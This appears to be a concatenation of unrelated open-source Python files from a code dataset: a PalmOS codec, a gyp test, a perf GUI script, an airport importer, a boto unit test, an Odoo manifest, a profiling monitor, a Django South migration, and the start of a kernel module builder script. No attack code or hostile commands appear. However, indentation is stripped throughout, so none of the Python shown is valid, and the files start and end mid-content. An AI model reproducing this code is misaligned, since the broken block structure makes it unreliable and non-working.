class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_map)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='palmos',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
### Decoding Map
decoding_map = codecs.make_identity_dict(range(256))
# The PalmOS character set is mostly iso-8859-1 with some differences.
decoding_map.update({
0x0080: 0x20ac, # EURO SIGN
0x0082: 0x201a, # SINGLE LOW-9 QUOTATION MARK
0x0083: 0x0192, # LATIN SMALL LETTER F WITH HOOK
0x0084: 0x201e, # DOUBLE LOW-9 QUOTATION MARK
0x0085: 0x2026, # HORIZONTAL ELLIPSIS
0x0086: 0x2020, # DAGGER
0x0087: 0x2021, # DOUBLE DAGGER
0x0088: 0x02c6, # MODIFIER LETTER CIRCUMFLEX ACCENT
0x0089: 0x2030, # PER MILLE SIGN
0x008a: 0x0160, # LATIN CAPITAL LETTER S WITH CARON
0x008b: 0x2039, # SINGLE LEFT-POINTING ANGLE QUOTATION MARK
0x008c: 0x0152, # LATIN CAPITAL LIGATURE OE
0x008d: 0x2666, # BLACK DIAMOND SUIT
0x008e: 0x2663, # BLACK CLUB SUIT
0x008f: 0x2665, # BLACK HEART SUIT
0x0090: 0x2660, # BLACK SPADE SUIT
0x0091: 0x2018, # LEFT SINGLE QUOTATION MARK
0x0092: 0x2019, # RIGHT SINGLE QUOTATION MARK
0x0093: 0x201c, # LEFT DOUBLE QUOTATION MARK
0x0094: 0x201d, # RIGHT DOUBLE QUOTATION MARK
0x0095: 0x2022, # BULLET
0x0096: 0x2013, # EN DASH
0x0097: 0x2014, # EM DASH
0x0098: 0x02dc, # SMALL TILDE
0x0099: 0x2122, # TRADE MARK SIGN
0x009a: 0x0161, # LATIN SMALL LETTER S WITH CARON
0x009c: 0x0153, # LATIN SMALL LIGATURE OE
0x009f: 0x0178, # LATIN CAPITAL LETTER Y WITH DIAERESIS
})
### Encoding Map
encoding_map = codecs.make_encoding_map(decoding_map)
|
overra/node-gyp | refs/heads/master | gyp/test/sibling/gyptest-all.py | 104 | #!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
"""
import TestGyp
test = TestGyp.TestGyp()
test.run_gyp('build/all.gyp', chdir='src')
test.build('build/all.gyp', test.ALL, chdir='src')
chdir = 'src/build'
# The top-level Makefile is in the directory where gyp was run.
# TODO(mmoss) Should the Makefile go in the directory of the passed in .gyp
# file? What about when passing in multiple .gyp files? Would sub-project
# Makefiles (see http://codereview.chromium.org/340008 comments) solve this?
if test.format in ('make', 'ninja'):
chdir = 'src'
if test.format == 'xcode':
chdir = 'src/prog1'
test.run_built_executable('program1',
chdir=chdir,
stdout="Hello from prog1.c\n")
if test.format == 'xcode':
chdir = 'src/prog2'
test.run_built_executable('program2',
chdir=chdir,
stdout="Hello from prog2.c\n")
test.pass_test()
|
Joshndroid/kernel_samsung_lt03wifi | refs/heads/test1 | tools/perf/scripts/python/Perf-Trace-Util/lib/Perf/Trace/SchedGui.py | 12980 | # SchedGui.py - Python extension for perf script, basic GUI code for
# traces drawing and overview.
#
# Copyright (C) 2010 by Frederic Weisbecker <fweisbec@gmail.com>
#
# This software is distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
try:
import wx
except ImportError:
raise ImportError, "You need to install the wxpython lib for this script"
class RootFrame(wx.Frame):
Y_OFFSET = 100
RECT_HEIGHT = 100
RECT_SPACE = 50
EVENT_MARKING_WIDTH = 5
def __init__(self, sched_tracer, title, parent = None, id = -1):
wx.Frame.__init__(self, parent, id, title)
(self.screen_width, self.screen_height) = wx.GetDisplaySize()
self.screen_width -= 10
self.screen_height -= 10
self.zoom = 0.5
self.scroll_scale = 20
self.sched_tracer = sched_tracer
self.sched_tracer.set_root_win(self)
(self.ts_start, self.ts_end) = sched_tracer.interval()
self.update_width_virtual()
self.nr_rects = sched_tracer.nr_rectangles() + 1
self.height_virtual = RootFrame.Y_OFFSET + (self.nr_rects * (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE))
# whole window panel
self.panel = wx.Panel(self, size=(self.screen_width, self.screen_height))
# scrollable container
self.scroll = wx.ScrolledWindow(self.panel)
self.scroll.SetScrollbars(self.scroll_scale, self.scroll_scale, self.width_virtual / self.scroll_scale, self.height_virtual / self.scroll_scale)
self.scroll.EnableScrolling(True, True)
self.scroll.SetFocus()
# scrollable drawing area
self.scroll_panel = wx.Panel(self.scroll, size=(self.screen_width - 15, self.screen_height / 2))
self.scroll_panel.Bind(wx.EVT_PAINT, self.on_paint)
self.scroll_panel.Bind(wx.EVT_KEY_DOWN, self.on_key_press)
self.scroll_panel.Bind(wx.EVT_LEFT_DOWN, self.on_mouse_down)
self.scroll.Bind(wx.EVT_PAINT, self.on_paint)
self.scroll.Bind(wx.EVT_KEY_DOWN, self.on_key_press)
self.scroll.Bind(wx.EVT_LEFT_DOWN, self.on_mouse_down)
self.scroll.Fit()
self.Fit()
self.scroll_panel.SetDimensions(-1, -1, self.width_virtual, self.height_virtual, wx.SIZE_USE_EXISTING)
self.txt = None
self.Show(True)
def us_to_px(self, val):
return val / (10 ** 3) * self.zoom
def px_to_us(self, val):
return (val / self.zoom) * (10 ** 3)
def scroll_start(self):
(x, y) = self.scroll.GetViewStart()
return (x * self.scroll_scale, y * self.scroll_scale)
def scroll_start_us(self):
(x, y) = self.scroll_start()
return self.px_to_us(x)
def paint_rectangle_zone(self, nr, color, top_color, start, end):
offset_px = self.us_to_px(start - self.ts_start)
width_px = self.us_to_px(end - self.ts_start)
offset_py = RootFrame.Y_OFFSET + (nr * (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE))
width_py = RootFrame.RECT_HEIGHT
dc = self.dc
if top_color is not None:
(r, g, b) = top_color
top_color = wx.Colour(r, g, b)
brush = wx.Brush(top_color, wx.SOLID)
dc.SetBrush(brush)
dc.DrawRectangle(offset_px, offset_py, width_px, RootFrame.EVENT_MARKING_WIDTH)
width_py -= RootFrame.EVENT_MARKING_WIDTH
offset_py += RootFrame.EVENT_MARKING_WIDTH
(r ,g, b) = color
color = wx.Colour(r, g, b)
brush = wx.Brush(color, wx.SOLID)
dc.SetBrush(brush)
dc.DrawRectangle(offset_px, offset_py, width_px, width_py)
def update_rectangles(self, dc, start, end):
start += self.ts_start
end += self.ts_start
self.sched_tracer.fill_zone(start, end)
def on_paint(self, event):
dc = wx.PaintDC(self.scroll_panel)
self.dc = dc
width = min(self.width_virtual, self.screen_width)
(x, y) = self.scroll_start()
start = self.px_to_us(x)
end = self.px_to_us(x + width)
self.update_rectangles(dc, start, end)
def rect_from_ypixel(self, y):
y -= RootFrame.Y_OFFSET
rect = y / (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE)
height = y % (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE)
if rect < 0 or rect > self.nr_rects - 1 or height > RootFrame.RECT_HEIGHT:
return -1
return rect
def update_summary(self, txt):
if self.txt:
self.txt.Destroy()
self.txt = wx.StaticText(self.panel, -1, txt, (0, (self.screen_height / 2) + 50))
def on_mouse_down(self, event):
(x, y) = event.GetPositionTuple()
rect = self.rect_from_ypixel(y)
if rect == -1:
return
t = self.px_to_us(x) + self.ts_start
self.sched_tracer.mouse_down(rect, t)
def update_width_virtual(self):
self.width_virtual = self.us_to_px(self.ts_end - self.ts_start)
def __zoom(self, x):
self.update_width_virtual()
(xpos, ypos) = self.scroll.GetViewStart()
xpos = self.us_to_px(x) / self.scroll_scale
self.scroll.SetScrollbars(self.scroll_scale, self.scroll_scale, self.width_virtual / self.scroll_scale, self.height_virtual / self.scroll_scale, xpos, ypos)
self.Refresh()
def zoom_in(self):
x = self.scroll_start_us()
self.zoom *= 2
self.__zoom(x)
def zoom_out(self):
x = self.scroll_start_us()
self.zoom /= 2
self.__zoom(x)
def on_key_press(self, event):
key = event.GetRawKeyCode()
if key == ord("+"):
self.zoom_in()
return
if key == ord("-"):
self.zoom_out()
return
key = event.GetKeyCode()
(x, y) = self.scroll.GetViewStart()
if key == wx.WXK_RIGHT:
self.scroll.Scroll(x + 1, y)
elif key == wx.WXK_LEFT:
self.scroll.Scroll(x - 1, y)
elif key == wx.WXK_DOWN:
self.scroll.Scroll(x, y + 1)
elif key == wx.WXK_UP:
self.scroll.Scroll(x, y - 1)
|
TobiasLohner/SkyLines | refs/heads/master | skylines/commands/import_/welt2000.py | 3 | from flask.ext.script import Command, Option
from skylines.database import db
from skylines.model import Airport
from skylines.lib.waypoints.welt2000 import get_database
from datetime import datetime
from sqlalchemy.sql.expression import or_, and_
class Welt2000(Command):
""" Import all airports from the WELT2000 project """
option_list = (
Option('--commit', action='store_true',
help='commit changes. Otherwise no changes are made to the database'),
Option('welt2000_path', nargs='?', metavar='WELT2000.TXT',
help='path to the WELT2000 file'),
)
def run(self, commit, welt2000_path):
welt2000 = get_database(path=welt2000_path)
self.current_date = datetime.utcnow()
i = 0
for airport_w2k in welt2000:
if (airport_w2k.type != 'airport' and
airport_w2k.type != 'glider_site' and
airport_w2k.type != 'ulm'):
continue
i += 1
if i % 100 == 0:
db.session.flush()
print str(i) + ": " + airport_w2k.country_code + " " + airport_w2k.name
# try to find this airport in the database
near_airport = Airport.query() \
.filter(and_(Airport.short_name == airport_w2k.short_name,
Airport.country_code == airport_w2k.country_code)) \
.filter(or_(Airport.valid_until == None, Airport.valid_until > self.current_date)) \
.first()
# fall back to location-search if airport is not found
# and only reuse this airport if it's within 250 meters of the old one...
if near_airport is None or near_airport.distance(airport_w2k) > 250:
near_airport = Airport.by_location(airport_w2k, distance_threshold=0.0025)
if near_airport is None:
# this airport is not in our database yet. add it...
self.add_airport(airport_w2k)
else:
# seems to be the same airport. update with current values
self.show_differences(near_airport, airport_w2k)
self.update_airport(near_airport, airport_w2k)
db.session.flush()
# now invalidate all remaining airports
invalid_airports = Airport.query() \
.filter(Airport.time_modified < self.current_date) \
.filter(or_(Airport.valid_until == None, Airport.valid_until > self.current_date))
for airport in invalid_airports:
print "{} {} {}" \
.format(airport.country_code, airport.name, airport.icao)
print " invalidated"
airport.valid_until = self.current_date
if commit:
db.session.commit()
def add_airport(self, airport_w2k):
airport = Airport()
self.update_airport(airport, airport_w2k)
db.session.add(airport)
def update_airport(self, airport, airport_w2k):
airport.location = airport_w2k
airport.altitude = airport_w2k.altitude
airport.name = airport_w2k.name
airport.short_name = airport_w2k.short_name
airport.icao = airport_w2k.icao
airport.country_code = airport_w2k.country_code
airport.surface = airport_w2k.surface
airport.runway_len = airport_w2k.runway_len
airport.runway_dir = airport_w2k.runway_dir
airport.frequency = airport_w2k.freq
airport.type = airport_w2k.type
airport.time_modified = self.current_date
def show_differences(self, airport, airport_w2k):
row2dict = lambda r: {c.name: getattr(r, c.name) for c in r.__table__.columns}
diff = DictDiffer(row2dict(airport), airport_w2k.__dict__)
changed = diff.changed()
distance = airport.distance(airport_w2k)
if changed or distance > 0.1:
print "{} {} {}" \
.format(airport.country_code, airport.name, airport.icao)
if distance > 0.1:
print " moved by {}m".format(distance)
for item in changed:
print " {} from {} to {}" \
.format(item, row2dict(airport)[item], airport_w2k.__dict__[item])
class DictDiffer(object):
"""
Calculate the difference between two dictionaries as:
(1) items added
(2) items removed
(3) keys same in both but changed values
(4) keys same in both and unchanged values
"""
def __init__(self, current_dict, past_dict):
self.current_dict, self.past_dict = current_dict, past_dict
self.set_current, self.set_past = set(current_dict.keys()), set(past_dict.keys())
self.intersect = self.set_current.intersection(self.set_past)
def added(self):
return self.set_current - self.intersect
def removed(self):
return self.set_past - self.intersect
def changed(self):
return set(o for o in self.intersect if self.past_dict[o] != self.current_dict[o])
def unchanged(self):
return set(o for o in self.intersect if self.past_dict[o] == self.current_dict[o])
|
drbild/boto | refs/heads/develop | tests/unit/ec2/test_snapshot.py | 114 | from tests.compat import OrderedDict
from tests.unit import AWSMockServiceTestCase
from boto.ec2.connection import EC2Connection
from boto.ec2.snapshot import Snapshot
class TestDescribeSnapshots(AWSMockServiceTestCase):
connection_class = EC2Connection
def default_body(self):
return b"""
<DescribeSnapshotsResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-01/">
<requestId>59dbff89-35bd-4eac-99ed-be587EXAMPLE</requestId>
<snapshotSet>
<item>
<snapshotId>snap-1a2b3c4d</snapshotId>
<volumeId>vol-1a2b3c4d</volumeId>
<status>pending</status>
<startTime>YYYY-MM-DDTHH:MM:SS.SSSZ</startTime>
<progress>30%</progress>
<ownerId>111122223333</ownerId>
<volumeSize>15</volumeSize>
<description>Daily Backup</description>
<tagSet>
<item>
<key>Purpose</key>
<value>demo_db_14_backup</value>
</item>
</tagSet>
<encrypted>false</encrypted>
</item>
</snapshotSet>
</DescribeSnapshotsResponse>
"""
def test_describe_snapshots(self):
self.set_http_response(status_code=200)
response = self.service_connection.get_all_snapshots(['snap-1a2b3c4d', 'snap-9f8e7d6c'],
owner=['self', '111122223333'],
restorable_by='999988887777',
filters=OrderedDict((('status', 'pending'),
('tag-value', '*db_*'))))
self.assert_request_parameters({
'Action': 'DescribeSnapshots',
'SnapshotId.1': 'snap-1a2b3c4d',
'SnapshotId.2': 'snap-9f8e7d6c',
'Owner.1': 'self',
'Owner.2': '111122223333',
'RestorableBy.1': '999988887777',
'Filter.1.Name': 'status',
'Filter.1.Value.1': 'pending',
'Filter.2.Name': 'tag-value',
'Filter.2.Value.1': '*db_*'},
ignore_params_values=['AWSAccessKeyId', 'SignatureMethod',
'SignatureVersion', 'Timestamp',
'Version'])
self.assertEqual(len(response), 1)
self.assertIsInstance(response[0], Snapshot)
self.assertEqual(response[0].id, 'snap-1a2b3c4d')
|
osvalr/odoo | refs/heads/8.0 | addons/base_import_module/tests/test_module/__openerp__.py | 377 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2013-Today OpenERP SA (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Test Module',
'category': 'Website',
'summary': 'Custom',
'version': '1.0',
'description': """
Test
""",
'author': 'OpenERP SA',
'depends': ['website'],
'data': [
'test.xml',
],
'installable': True,
'application': True,
}
|
enthought/pikos | refs/heads/master | pikos/monitors/function_monitor.py | 1 | # -*- coding: utf-8 -*-
#------------------------------------------------------------------------------
# Package: Pikos toolkit
# File: monitors/function_monitor.py
# License: LICENSE.TXT
#
# Copyright (c) 2012, Enthought, Inc.
# All rights reserved.
#------------------------------------------------------------------------------
from __future__ import absolute_import
from pikos._internal.profile_function_manager import ProfileFunctionManager
from pikos._internal.keep_track import KeepTrack
from pikos.monitors.monitor import Monitor
from pikos.monitors.records import FunctionRecord
class FunctionMonitor(Monitor):
""" Record python function events.
The class hooks on the setprofile function to receive function events and
record them.
"""
def __init__(self, recorder, record_type=None):
""" Initialize the monitoring class.
Parameters
----------
recorder : object
A subclass of :class:`~.AbstractRecorder` or a class that
implements the same interface to handle the values to be logged.
record_type : type
A class object to be used for records. Default is
:class:`~.FunctionRecord`.
"""
self._recorder = recorder
self._record = recorder.record
self._profiler = ProfileFunctionManager()
self._index = 0
self._call_tracker = KeepTrack()
if record_type is None:
self._record_type = FunctionRecord
else:
self._record_type = record_type
self._use_tuple = self._record_type is tuple
def enable(self):
""" Enable the monitor.
The first time the method is called (the context is entered) it will
set the setprofile hooks and initialize the recorder.
"""
if self._call_tracker('ping'):
self._recorder.prepare(self._record_type)
self._profiler.replace(self.on_function_event)
def disable(self):
""" Disable the monitor.
The last time the method is called (the context is exited) it will
unset the setprofile hooks and finalize the recorder.
"""
if self._call_tracker('pong'):
self._profiler.recover()
self._recorder.finalize()
def on_function_event(self, frame, event, arg):
""" Record the current function event.
Called on function events, it will retrieve the necessary information
from the `frame`, create a :class:`FunctionRecord` and send it to the
recorder.
"""
record = self.gather_info(frame, event, arg)
if not self._use_tuple:
record = self._record_type(*record)
self._record(record)
self._index += 1
def gather_info(self, frame, event, arg):
""" Gather information for the record.
"""
if '_' == event[1]:
return (
self._index, event, arg.__name__,
frame.f_lineno, frame.f_code.co_filename)
else:
code = frame.f_code
return (
self._index, event, code.co_name,
frame.f_lineno, code.co_filename)
|
driftx/Telephus | refs/heads/master | examples/deferreds/supercolumn.py | 12133432 | |
helenst/django | refs/heads/master | tests/empty/no_models/__init__.py | 12133432 | |
yetilinux/yetiweb | refs/heads/master | packages/migrations/0010_auto__add_signoffspecification.py | 4 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
db.create_table('packages_signoffspecification', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('pkgbase', self.gf('django.db.models.fields.CharField')(max_length=255, db_index=True)),
('pkgver', self.gf('django.db.models.fields.CharField')(max_length=255)),
('pkgrel', self.gf('django.db.models.fields.CharField')(max_length=255)),
('epoch', self.gf('django.db.models.fields.PositiveIntegerField')(default=0)),
('arch', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['main.Arch'])),
('repo', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['main.Repo'])),
('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])),
('created', self.gf('django.db.models.fields.DateTimeField')()),
('required', self.gf('django.db.models.fields.PositiveIntegerField')(default=2)),
('enabled', self.gf('django.db.models.fields.BooleanField')(default=True)),
('known_bad', self.gf('django.db.models.fields.BooleanField')(default=False)),
('comments', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
))
db.send_create_signal('packages', ['SignoffSpecification'])
def backwards(self, orm):
db.delete_table('packages_signoffspecification')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'main.arch': {
'Meta': {'ordering': "['name']", 'object_name': 'Arch', 'db_table': "'arches'"},
'agnostic': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'})
},
'main.package': {
'Meta': {'ordering': "('pkgname',)", 'object_name': 'Package', 'db_table': "'packages'"},
'arch': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'packages'", 'to': "orm['main.Arch']"}),
'build_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'compressed_size': ('main.models.PositiveBigIntegerField', [], {}),
'epoch': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'filename': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'files_last_update': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'flag_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'installed_size': ('main.models.PositiveBigIntegerField', [], {}),
'last_update': ('django.db.models.fields.DateTimeField', [], {}),
'packager': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
'packager_str': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'pgp_signature': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'pkgbase': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'pkgdesc': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'pkgname': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'pkgrel': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'pkgver': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'repo': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'packages'", 'to': "orm['main.Repo']"}),
'url': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'})
},
'main.repo': {
'Meta': {'ordering': "['name']", 'object_name': 'Repo', 'db_table': "'repos'"},
'bugs_category': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'bugs_project': ('django.db.models.fields.SmallIntegerField', [], {'default': '1'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'staging': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'svn_root': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'testing': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'packages.conflict': {
'Meta': {'ordering': "['name']", 'object_name': 'Conflict'},
'comparison': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'pkg': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'conflicts'", 'to': "orm['main.Package']"}),
'version': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255'})
},
'packages.license': {
'Meta': {'ordering': "['name']", 'object_name': 'License'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'pkg': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'licenses'", 'to': "orm['main.Package']"})
},
'packages.packagegroup': {
'Meta': {'object_name': 'PackageGroup'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'pkg': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'groups'", 'to': "orm['main.Package']"})
},
'packages.packagerelation': {
'Meta': {'unique_together': "(('pkgbase', 'user', 'type'),)", 'object_name': 'PackageRelation'},
'created': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'pkgbase': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'type': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'package_relations'", 'to': "orm['auth.User']"})
},
'packages.provision': {
'Meta': {'ordering': "['name']", 'object_name': 'Provision'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'pkg': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'provides'", 'to': "orm['main.Package']"}),
'version': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255'})
},
'packages.replacement': {
'Meta': {'ordering': "['name']", 'object_name': 'Replacement'},
'comparison': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'pkg': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'replaces'", 'to': "orm['main.Package']"}),
'version': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255'})
},
'packages.signoff': {
'Meta': {'object_name': 'Signoff'},
'arch': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['main.Arch']"}),
'comments': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {}),
'epoch': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'pkgbase': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'pkgrel': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'pkgver': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'repo': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['main.Repo']"}),
'revoked': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'package_signoffs'", 'to': "orm['auth.User']"})
},
'packages.signoffspecification': {
'Meta': {'object_name': 'SignoffSpecification'},
'arch': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['main.Arch']"}),
'comments': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {}),
'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'epoch': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'known_bad': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'pkgbase': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'pkgrel': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'pkgver': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'repo': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['main.Repo']"}),
'required': ('django.db.models.fields.PositiveIntegerField', [], {'default': '2'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
}
}
complete_apps = ['packages']
|
fschaefer/android-samsung-3.0-jb | refs/heads/android-samsung-3.0-jb-mr0 | Documentation/target/tcm_mod_builder.py | 3119 | #!/usr/bin/python
# The TCM v4 multi-protocol fabric module generation script for drivers/target/$NEW_MOD
#
# Copyright (c) 2010 Rising Tide Systems
# Copyright (c) 2010 Linux-iSCSI.org
#
# Author: nab@kernel.org
#
import os, sys
import subprocess as sub
import string
import re
import optparse
tcm_dir = ""
fabric_ops = []
fabric_mod_dir = ""
fabric_mod_port = ""
fabric_mod_init_port = ""
def tcm_mod_err(msg):
print msg
sys.exit(1)
def tcm_mod_create_module_subdir(fabric_mod_dir_var):
if os.path.isdir(fabric_mod_dir_var) == True:
return 1
print "Creating fabric_mod_dir: " + fabric_mod_dir_var
ret = os.mkdir(fabric_mod_dir_var)
if ret:
tcm_mod_err("Unable to mkdir " + fabric_mod_dir_var)
return
def tcm_mod_build_FC_include(fabric_mod_dir_var, fabric_mod_name):
global fabric_mod_port
global fabric_mod_init_port
buf = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_base.h"
print "Writing file: " + f
p = open(f, 'w');
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "#define " + fabric_mod_name.upper() + "_VERSION \"v0.1\"\n"
buf += "#define " + fabric_mod_name.upper() + "_NAMELEN 32\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_nacl {\n"
buf += " /* Binary World Wide unique Port Name for FC Initiator Nport */\n"
buf += " u64 nport_wwpn;\n"
buf += " /* ASCII formatted WWPN for FC Initiator Nport */\n"
buf += " char nport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_nodeacl() */\n"
